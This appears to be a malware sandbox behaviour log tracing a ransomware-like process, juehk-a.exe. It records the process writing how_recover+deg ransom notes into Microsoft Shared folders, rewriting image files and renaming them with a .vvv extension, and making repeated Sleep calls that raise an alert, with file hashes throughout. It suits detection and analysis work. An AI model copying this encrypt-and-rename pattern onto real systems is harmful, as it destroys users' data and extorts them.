- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813766357
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72613
- mode: created
- sequenceNumber: 1002
- value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521097
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72617
- mode: close
- sequenceNumber: 1003
- value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521097
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72622
- mode: created
- sequenceNumber: 1004
- value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521098
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72626
- mode: close
- sequenceNumber: 1005
- value: C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521098
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72657
- mode: created
- sequenceNumber: 1006
- value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521099
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72662
- mode: close
- sequenceNumber: 1007
- value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521099
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 72733
- repeat: 900
- sequenceNumber: 1008
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 72961
- mode: created
- sequenceNumber: 1009
- value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521100
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72966
- mode: close
- sequenceNumber: 1010
- value: C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521100
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 72975
- repeat: 1000
- sequenceNumber: 1011
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- malicious-alert:
- classtype: High Repeated Sleep Calls
- weight: 0
- ruleid: 5202 : High repeated sleep calls ; High repeated number of sleep calls
- msg: High repeated number of sleep calls
- display-msg: High repeated sleep calls
- file:
- timestamp: 73040
- mode: open
- sequenceNumber: 1012
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
- filesize: 15067
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953495997
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73389
- mode: close
- sequenceNumber: 1013
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
- filesize: 15486
- md5sum: 6028b8017e2b1cdf121534356ff65e7e
- sha1sum: 5a5f960a1cab09e09c369e00fe83bc6bb3df801a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953495997
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73425
- mode: rename
- sequenceNumber: 1014
- filesize: 15486
- md5sum: 6028b8017e2b1cdf121534356ff65e7e
- sha1sum: 5a5f960a1cab09e09c369e00fe83bc6bb3df801a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
- new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS.vvv
- ads:
- fid (ads:): 562949953495997
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73440
- mode: open
- sequenceNumber: 1015
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
- filesize: 1061
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953495999
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73456
- mode: close
- sequenceNumber: 1016
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
- filesize: 1486
- md5sum: 5c6bafaa69d0fed20a975a47af8588a5
- sha1sum: a85e430f942cece7a97a440eea8c674ffdd6ad9c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953495999
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73470
- mode: rename
- sequenceNumber: 1017
- filesize: 1486
- md5sum: 5c6bafaa69d0fed20a975a47af8588a5
- sha1sum: a85e430f942cece7a97a440eea8c674ffdd6ad9c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
- new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG.vvv
- ads:
- fid (ads:): 562949953495999
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73477
- mode: open
- sequenceNumber: 1018
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
- filesize: 1682
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953496000
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73812
- mode: close
- sequenceNumber: 1019
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
- filesize: 2110
- md5sum: 91ea306138d0ffd0c06c0830cd478b1f
- sha1sum: 30ff39edb672dc9719632c07c960f0d90103111a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953496000
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73842
- mode: rename
- sequenceNumber: 1020
- filesize: 2110
- md5sum: 91ea306138d0ffd0c06c0830cd478b1f
- sha1sum: 30ff39edb672dc9719632c07c960f0d90103111a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG.vvv
- ads:
- fid (ads:): 562949953496000
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73875
- mode: created
- sequenceNumber: 1021
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3096224743898678
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73880
- mode: close
- sequenceNumber: 1022
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3096224743898678
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73889
- mode: created
- sequenceNumber: 1023
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521101
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73893
- mode: close
- sequenceNumber: 1024
- value: C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521101
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73947
- mode: created
- sequenceNumber: 1025
- value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521102
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73953
- mode: close
- sequenceNumber: 1026
- value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521102
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73960
- mode: created
- sequenceNumber: 1027
- value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521103
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73965
- mode: close
- sequenceNumber: 1028
- value: C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521103
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73979
- mode: created
- sequenceNumber: 1029
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521104
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73985
- mode: close
- sequenceNumber: 1030
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521104
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 73991
- mode: created
- sequenceNumber: 1031
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521105
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 73997
- mode: close
- sequenceNumber: 1032
- value: C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521105
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74003
- mode: created
- sequenceNumber: 1033
- value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521106
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74009
- mode: close
- sequenceNumber: 1034
- value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521106
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74017
- mode: created
- sequenceNumber: 1035
- value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521107
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74021
- mode: close
- sequenceNumber: 1036
- value: C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521107
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74036
- mode: created
- sequenceNumber: 1037
- value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521108
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74042
- mode: close
- sequenceNumber: 1038
- value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521108
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74050
- mode: created
- sequenceNumber: 1039
- value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521109
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74057
- mode: close
- sequenceNumber: 1040
- value: C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521109
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74065
- mode: created
- sequenceNumber: 1041
- value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521110
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74072
- mode: close
- sequenceNumber: 1042
- value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521110
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74079
- mode: created
- sequenceNumber: 1043
- value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521111
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74085
- mode: close
- sequenceNumber: 1044
- value: C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521111
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74094
- mode: created
- sequenceNumber: 1045
- value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521112
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74101
- mode: close
- sequenceNumber: 1046
- value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521112
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74117
- mode: created
- sequenceNumber: 1047
- value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521113
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74123
- mode: close
- sequenceNumber: 1048
- value: C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521113
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74130
- mode: created
- sequenceNumber: 1049
- value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521114
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74136
- mode: close
- sequenceNumber: 1050
- value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521114
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74143
- mode: created
- sequenceNumber: 1051
- value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521115
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74148
- mode: close
- sequenceNumber: 1052
- value: C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521115
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74259
- mode: failed
- sequenceNumber: 1053
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-correct.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74264
- mode: failed
- sequenceNumber: 1054
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74284
- mode: failed
- sequenceNumber: 1055
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74291
- mode: failed
- sequenceNumber: 1056
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74297
- mode: failed
- sequenceNumber: 1057
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\correct.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74304
- mode: failed
- sequenceNumber: 1058
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74341
- mode: failed
- sequenceNumber: 1059
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74405
- mode: failed
- sequenceNumber: 1060
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 74554
- mode: created
- sequenceNumber: 1061
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521116
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74560
- mode: close
- sequenceNumber: 1062
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521116
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 74566
- mode: created
- sequenceNumber: 1063
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521117
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 74572
- mode: close
- sequenceNumber: 1064
- value: C:\Program Files\Common Files\Microsoft Shared\ink\en-US\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
